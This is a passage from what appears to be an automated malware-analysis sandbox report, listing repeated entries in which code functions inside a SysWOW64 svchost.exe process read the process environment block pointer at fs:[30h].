Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]	2_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]	2_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]	2_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]	2_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]	2_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]	2_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]	2_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]	2_2_030F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]	2_2_030F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031061E5 mov eax, dword ptr fs:[00000030h]	2_2_031061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030601F8 mov eax, dword ptr fs:[00000030h]	2_2_030601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B4000 mov ecx, dword ptr fs:[00000030h]	2_2_030B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]	2_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]	2_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]	2_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]	2_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302A020 mov eax, dword ptr fs:[00000030h]	2_2_0302A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302C020 mov eax, dword ptr fs:[00000030h]	2_2_0302C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C6030 mov eax, dword ptr fs:[00000030h]	2_2_030C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03032050 mov eax, dword ptr fs:[00000030h]	2_2_03032050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6050 mov eax, dword ptr fs:[00000030h]	2_2_030B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305C073 mov eax, dword ptr fs:[00000030h]	2_2_0305C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303208A mov eax, dword ptr fs:[00000030h]	2_2_0303208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030280A0 mov eax, dword ptr fs:[00000030h]	2_2_030280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C80A8 mov eax, dword ptr fs:[00000030h]	2_2_030C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F60B8 mov eax, dword ptr fs:[00000030h]	2_2_030F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_030F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B20DE mov eax, dword ptr fs:[00000030h]	2_2_030B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0302A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030380E9 mov eax, dword ptr fs:[00000030h]	2_2_030380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B60E0 mov eax, dword ptr fs:[00000030h]	2_2_030B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0302C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030720F0 mov ecx, dword ptr fs:[00000030h]	2_2_030720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C700 mov eax, dword ptr fs:[00000030h]	2_2_0306C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030710 mov eax, dword ptr fs:[00000030h]	2_2_03030710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03060710 mov eax, dword ptr fs:[00000030h]	2_2_03060710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]	2_2_0306C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]	2_2_0306C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]	2_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306273C mov ecx, dword ptr fs:[00000030h]	2_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]	2_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AC730 mov eax, dword ptr fs:[00000030h]	2_2_030AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306674D mov esi, dword ptr fs:[00000030h]	2_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]	2_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]	2_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030750 mov eax, dword ptr fs:[00000030h]	2_2_03030750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BE75D mov eax, dword ptr fs:[00000030h]	2_2_030BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]	2_2_03072750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]	2_2_03072750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B4755 mov eax, dword ptr fs:[00000030h]	2_2_030B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038770 mov eax, dword ptr fs:[00000030h]	2_2_03038770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D678E mov eax, dword ptr fs:[00000030h]	2_2_030D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030307AF mov eax, dword ptr fs:[00000030h]	2_2_030307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E47A0 mov eax, dword ptr fs:[00000030h]	2_2_030E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0303C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B07C3 mov eax, dword ptr fs:[00000030h]	2_2_030B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]	2_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]	2_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]	2_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_030BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]	2_2_030347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]	2_2_030347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE609 mov eax, dword ptr fs:[00000030h]	2_2_030AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072619 mov eax, dword ptr fs:[00000030h]	2_2_03072619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E627 mov eax, dword ptr fs:[00000030h]	2_2_0304E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03066620 mov eax, dword ptr fs:[00000030h]	2_2_03066620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03068620 mov eax, dword ptr fs:[00000030h]	2_2_03068620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303262C mov eax, dword ptr fs:[00000030h]	2_2_0303262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304C640 mov eax, dword ptr fs:[00000030h]	2_2_0304C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]	2_2_030F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]	2_2_030F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]	2_2_0306A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]	2_2_0306A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03062674 mov eax, dword ptr fs:[00000030h]	2_2_03062674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]	2_2_03034690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]	2_2_03034690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0306C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030666B0 mov eax, dword ptr fs:[00000030h]	2_2_030666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0306A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0306A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]	2_2_030B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]	2_2_030B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C6500 mov eax, dword ptr fs:[00000030h]	2_2_030C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]	2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]	2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]	2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]	2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]	2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]	2_2_03038550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]	2_2_03038550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]	2_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]	2_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]	2_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03032582 mov eax, dword ptr fs:[00000030h]	2_2_03032582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03032582 mov ecx, dword ptr fs:[00000030h]	2_2_03032582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03064588 mov eax, dword ptr fs:[00000030h]	2_2_03064588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E59C mov eax, dword ptr fs:[00000030h]	2_2_0306E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]	2_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]	2_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]	2_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]	2_2_030545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]	2_2_030545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]	2_2_0306E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]	2_2_0306E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030365D0 mov eax, dword ptr fs:[00000030h]	2_2_030365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0306A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0306A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030325E0 mov eax, dword ptr fs:[00000030h]	2_2_030325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]	2_2_0306C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]	2_2_0306C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]	2_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]	2_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]	2_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]	2_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]	2_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]	2_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302C427 mov eax, dword ptr fs:[00000030h]	2_2_0302C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A430 mov eax, dword ptr fs:[00000030h]	2_2_0306A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EA456 mov eax, dword ptr fs:[00000030h]	2_2_030EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302645D mov eax, dword ptr fs:[00000030h]	2_2_0302645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305245A mov eax, dword ptr fs:[00000030h]	2_2_0305245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BC460 mov ecx, dword ptr fs:[00000030h]	2_2_030BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]	2_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]	2_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]	2_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EA49A mov eax, dword ptr fs:[00000030h]	2_2_030EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030364AB mov eax, dword ptr fs:[00000030h]	2_2_030364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030644B0 mov ecx, dword ptr fs:[00000030h]	2_2_030644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_030BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030304E5 mov ecx, dword ptr fs:[00000030h]	2_2_030304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104B00 mov eax, dword ptr fs:[00000030h]	2_2_03104B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]	2_2_0305EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]	2_2_0305EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]	2_2_030F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]	2_2_030F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h]	2_2_030E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h]	2_2_030E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]	2_2_03102B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]	2_2_03102B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]	2_2_03102B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]	2_2_03102B57
